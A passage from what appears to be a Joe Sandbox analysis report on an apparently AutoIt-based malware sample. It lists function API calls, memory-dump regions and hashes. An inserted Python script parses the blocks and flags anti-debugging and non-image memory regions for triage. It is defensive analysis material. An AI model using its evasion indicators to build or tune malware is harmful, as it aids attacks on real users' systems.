                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                    • Instruction ID: 01dc4a0225441cfcdc77099f911db158ad188bd0a591e24b909d54e5b506775d
                                    • Opcode Fuzzy Hash: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                    • Instruction Fuzzy Hash: 8031CAB2604516AFC704EF68C8D1D69F3B5FF493207258629E519CB791EB30ED60CB90
                                    APIs
                                    • 745EC8D0.UXTHEME ref: 00884834
                                      • Part of subcall function 008A336C: __lock.LIBCMT ref: 008A3372
                                      • Part of subcall function 008A336C: RtlDecodePointer.NTDLL(00000001), ref: 008A337E
                                      • Part of subcall function 008A336C: RtlEncodePointer.NTDLL(?), ref: 008A3389
                                      • Part of subcall function 008848FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00884915
                                      • Part of subcall function 008848FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0088492A
                                      • Part of subcall function 00883B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B68
                                      • Part of subcall function 00883B3A: IsDebuggerPresent.KERNEL32 ref: 00883B7A
                                      • Part of subcall function 00883B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009452F8,009452E0,?,?), ref: 00883BEB
                                      • Part of subcall function 00883B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00883C6F
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00884874
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                    • String ID:
                                    • API String ID: 2688871447-0
                                    • Opcode ID: 6f2430e49bd2ced7a2c30042d9c2ed331f2523eb410446dc7d326e6430ffd12d
                                    • Instruction ID: 09eb070b9f8dd28051087d68a215ef562e4ddffaf157532e408c189a3d234f61
                                    • Opcode Fuzzy Hash: 6f2430e49bd2ced7a2c30042d9c2ed331f2523eb410446dc7d326e6430ffd12d
                                    • Instruction Fuzzy Hash: A1118E719283029FCB00EF68E80591ABFE8FF86750F10452BF051C3272DBB09644DB92
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    • Opcode ID: a80c093686bc2db12f19d67e0a47e02d810a9092e6836085a66eecb33b81e77c
                                    • Instruction ID: ed180e355e86904c5a51db08803e17c1dfb53dd83d40128cec3ebabddcd02fa7
                                    • Opcode Fuzzy Hash: a80c093686bc2db12f19d67e0a47e02d810a9092e6836085a66eecb33b81e77c
                                    • Instruction Fuzzy Hash: 0201D471800A08EBEF12AF6CCD0249E7B71FFA3321F444115F8149B591EB318AA1DFA2
                                    APIs
                                      • Part of subcall function 008A8B28: __getptd_noexit.LIBCMT ref: 008A8B28
                                    • __lock_file.LIBCMT ref: 008A53EB
                                      • Part of subcall function 008A6C11: __lock.LIBCMT ref: 008A6C34
                                    • __fclose_nolock.LIBCMT ref: 008A53F6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                    • String ID:
                                    • API String ID: 2800547568-0
                                    • Opcode ID: f7129c6b4d9e22aeb64323f388bfe36cbd861f46b7e88ba4ce87d0566fc8fc88
                                    • Instruction ID: e934067ad5eae2ff363fd58cd1190628272006d0ab84c1fffc69ea622f120d1b
                                    • Opcode Fuzzy Hash: f7129c6b4d9e22aeb64323f388bfe36cbd861f46b7e88ba4ce87d0566fc8fc88
                                    • Instruction Fuzzy Hash: 99F09671801A04DAFF106B6998057AE7AE0FF83374F248508E464EBAC1DBBC49815B63
                                    APIs
                                      • Part of subcall function 015F91E0: GetFileAttributesW.KERNELBASE(?), ref: 015F91EB
                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 015F9A9F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AttributesCreateDirectoryFile
                                    • String ID:
                                    • API String ID: 3401506121-0
                                    • Opcode ID: a3629c909564942c7c8b75870f835829e090811fdfb2092ae3fc6556c3fc90d6
                                    • Instruction ID: 5320b177317d73317a35caa172307b3f974c134491247eabb84f9dffa1c2d1af
                                    • Opcode Fuzzy Hash: a3629c909564942c7c8b75870f835829e090811fdfb2092ae3fc6556c3fc90d6
                                    • Instruction Fuzzy Hash: EC516531A1050E96EF14EF64C944BEF7379FF98300F4045A9B609EB180EB79AB49CB65
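As an added example (it is not part of the Joe Sandbox report or of its tooling), the Python below parses function blocks in the text layout shown above into records and runs a small triage over them: it separates direct call sites from "Part of subcall function" hits, keeps the "based on PE" flag of the dump region the block was lifted from, and flags a watchlist of APIs. The sample input is copied from two blocks on this page; the watchlist, the triage wording and the record names are assumptions of this example, not Joe Sandbox logic. The two SPI constant names are the Windows SDK values for the SystemParametersInfo actions 0x2000 and 0x2001 that appear in these blocks.

```python
"""Parse Joe Sandbox function blocks (APIs / Memory Dump Source / Similarity)
and triage them. Added example, not Joe Sandbox code; sample text is copied
from this page, watchlist and rules are the example's own assumptions."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line, e.g. "_free.LIBCMT ref: 008E8D1B" or
# "Part of subcall function 008A2D55: RtlFreeHeap.NTDLL(00000000,?), ref: 008A2D69"
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
SOURCE_LINE = re.compile(
    r"^Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-F]+), "
    r"based on PE: (?P<pe>true|false)$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]  # parent address for "Part of subcall function" hits

@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    offset: str = ""
    pe_backed: Optional[bool] = None  # None until a Source File line is seen
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""

def _clean(line: str) -> str:
    return line.strip().lstrip("•").strip()

def parse_blocks(text: str) -> List[FunctionBlock]:
    """Each block starts at an 'APIs' heading; everything up to the next one belongs to it."""
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = SOURCE_LINE.match(line)
        if m:
            cur.source_file, cur.offset = m["file"], m["offset"]
            cur.pe_backed = m["pe"] == "true"
            continue
        for label, attr in (("API ID:", "api_id"), ("String ID:", "string_id"), ("Opcode ID:", "opcode_id")):
            if line.startswith(label):
                setattr(cur, attr, line[len(label):].strip())
                break
    return blocks

# Assumed watchlist: APIs an analyst would open first in a RAT/loader sample.
WATCHLIST = {
    "IsDebuggerPresent": "anti-debug check",
    "VirtualProtect": "page protection change (unpacking / self-modifying code)",
    "LoadLibraryExW": "dynamic library loading",
    "CreateDirectoryW": "filesystem write",
    "SystemParametersInfoW": "system UI parameter change",
}
# Windows SDK values for the SystemParametersInfo actions seen in these blocks.
SPI_ACTIONS = {0x2000: "SPI_GETFOREGROUNDLOCKTIMEOUT", 0x2001: "SPI_SETFOREGROUNDLOCKTIMEOUT"}

def triage(blocks: List[FunctionBlock]) -> List[str]:
    findings = []
    for b in blocks:
        if b.pe_backed is False:
            findings.append(f"{b.offset}: code in memory not backed by a PE image (unpacked/injected code)")
        for c in b.calls:
            if c.name not in WATCHLIST:
                continue
            note = WATCHLIST[c.name]
            if c.name == "SystemParametersInfoW" and c.args:
                try:
                    note += f" [{SPI_ACTIONS.get(int(c.args[0], 16), c.args[0])}]"
                except ValueError:
                    pass  # first argument was '?' (unresolved)
            where = f"via subcall {c.subcall_of}" if c.subcall_of else "direct"
            findings.append(f"{b.offset}: {c.name}.{c.module} @ {c.ref} ({where}) -> {note}")
    return findings

# Constructed sample: two blocks copied from this report page.
SAMPLE = """\
APIs
• 745EC8D0.UXTHEME ref: 00884834
  • Part of subcall function 00883B3A: IsDebuggerPresent.KERNEL32 ref: 00883B7A
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00884874
Memory Dump Source
• Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
• String ID:
APIs
  • Part of subcall function 015F91E0: GetFileAttributesW.KERNELBASE(?), ref: 015F91EB
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 015F9A9F
Memory Dump Source
• Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
Similarity
• API ID: AttributesCreateDirectoryFile
"""

if __name__ == "__main__":
    for line in triage(parse_blocks(SAMPLE)):
        print(line)
```

The second sample block is the one lifted from 0x015F8000 with "based on PE: false": its code was captured from memory that is not a mapped image, which is exactly where this report places the GetFileAttributesW/CreateDirectoryW call sites. That region, not the AutoIt runtime at 0x00880000, is what a practitioner would carve out and scan first.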
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: 917dd54d1a6275c139c61eb7335d39d8bf878020d41e408aa861bbe2d8991666
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: B431D570A001099BE718DF58C484969F7A6FB5A320B6487A5E80ACFB51D731EED1DFC0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 9d61d9d0c138318badf97d2c89d98184d5ec50aed61f100ae4535fef6969e352
                                    • Instruction ID: 85ef43183849a6ce282b3d58c53f93d9c84848b6103f1fc2bef2cc01e8355677
                                    • Opcode Fuzzy Hash: 9d61d9d0c138318badf97d2c89d98184d5ec50aed61f100ae4535fef6969e352
                                    • Instruction Fuzzy Hash: 8841D4745043419FEB24DF18C454B1ABBE1FF49318F0988ACE9998B762C736E845CF52
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 1a92a8d2d274328c4bdae9058aedb4b7ce38b925b86feb4cf6e4d7e8b767809e
                                    • Instruction ID: 1cb682e5a969953c30681da2064e94378dfe3d807b82c575017ea5d8841df713
                                    • Opcode Fuzzy Hash: 1a92a8d2d274328c4bdae9058aedb4b7ce38b925b86feb4cf6e4d7e8b767809e
                                    • Instruction Fuzzy Hash: 4521F772A24A09EBDB249F15E8517EA7FB4FF14360F218529E485C52A0EB70D1D0DB45
                                    APIs
                                      • Part of subcall function 00884BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00884BEF
                                      • Part of subcall function 008A525B: __wfsopen.LIBCMT ref: 008A5266
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884E0F
                                      • Part of subcall function 00884B6A: FreeLibrary.KERNEL32(00000000), ref: 00884BA4
                                      • Part of subcall function 00884C70: _memmove.LIBCMT ref: 00884CBA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Library$Free$Load__wfsopen_memmove
                                    • String ID:
                                    • API String ID: 1396898556-0
                                    • Opcode ID: a7ff77bcbfaed77811547a865bb4c308c56aa463a34db894f0b3e21355a2b778
                                    • Instruction ID: 8c2e27a7c33050b24e2e54b11e7a963210a229f8985ebf37cf8d0be224712049
                                    • Opcode Fuzzy Hash: a7ff77bcbfaed77811547a865bb4c308c56aa463a34db894f0b3e21355a2b778
                                    • Instruction Fuzzy Hash: 3711E733640306ABCF20FFB8C812FAE77A9FF44720F108829F541E7181EA719A009B52
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 8239f18fc50af0b1accaf65d671bc33402258e281a271469b1aebe96ff4b15e4
                                    • Instruction ID: 0d14451919be46a4290438b674279b5a42db6262cfa93b15c59bcfddf2c23ebf
                                    • Opcode Fuzzy Hash: 8239f18fc50af0b1accaf65d671bc33402258e281a271469b1aebe96ff4b15e4
                                    • Instruction Fuzzy Hash: 0A21F374508341DFDB24EF64C444A2ABBE1FF89314F058968F98A97762D731E815CF92
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A07B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID:
                                    • API String ID: 82841172-0
                                    • Opcode ID: 29103d501496fe8fa86c701e03e5f947c9735dafba124bfda064f08d2be8de5a
                                    • Instruction ID: 031303c402fd9e76263444b0d9b0b45832b0d0da06afc3fab23f9e3589fbd738
                                    • Opcode Fuzzy Hash: 29103d501496fe8fa86c701e03e5f947c9735dafba124bfda064f08d2be8de5a
                                    • Instruction Fuzzy Hash: 34016D775040489FC711EB64EC41EE4BBACEFCA360B0401FAEC89CB961E6209A599B91
                                    APIs
                                    • __lock_file.LIBCMT ref: 008A48A6
                                      • Part of subcall function 008A8B28: __getptd_noexit.LIBCMT ref: 008A8B28
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock_file
                                    • String ID:
                                    • API String ID: 2597487223-0
                                    • Opcode ID: dc6d2ab047b0099602d6d159a1825de166305619240a7184a035586e4030379d
                                    • Instruction ID: df85e9a7815ca45f302fdf2a11554c28c3d59f66cc96ce66cf7eb28872ec63fd
                                    • Opcode Fuzzy Hash: dc6d2ab047b0099602d6d159a1825de166305619240a7184a035586e4030379d
                                    • Instruction Fuzzy Hash: 1DF0A431900649EBFF11AF689C0579E3AA0FF42325F155424B414D7992DBFC8951DB62
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,009452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884E7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: a837dd9e64a277a05643c377525c5cda11b6b3182e718a4f0258b8ebf12390b9
                                    • Instruction ID: 2e3e383939a57f8bcf57c3c0d8789e165c4a76113e6c96331111b5205da68a70
                                    • Opcode Fuzzy Hash: a837dd9e64a277a05643c377525c5cda11b6b3182e718a4f0258b8ebf12390b9
                                    • Instruction Fuzzy Hash: 7BF03072505712CFCB34AF64D494812B7E1FF55339320993EE1D6C2610C732A840DF40
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A07B0
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LongNamePath_memmove
                                    • String ID:
                                    • API String ID: 2514874351-0
                                    • Opcode ID: 7869ef6f29254bf57877fe9214d4d222949e1f708509dfc713f7adefca324349
                                    • Instruction ID: 34766cd5d2ba7fa6c61e921843d973f2ca4b8555fcb4667ee72a19a5a6c7aa20
                                    • Opcode Fuzzy Hash: 7869ef6f29254bf57877fe9214d4d222949e1f708509dfc713f7adefca324349
                                    • Instruction Fuzzy Hash: A3E086369041285BC720A65C9C05FEA77ADEB887A0F0441B5FC08D7205D9609D808691
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                    • Instruction ID: 7ecc33a1b10509faf0ca27ec67541a2252f87de3361c460be49f4395444d65f4
                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                    • Instruction Fuzzy Hash: DAE092B0504B409FD7388A24D801BA373E1FB06304F00081DF6AAC3241EB6278418B59
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 015F91EB
                                    Memory Dump Source
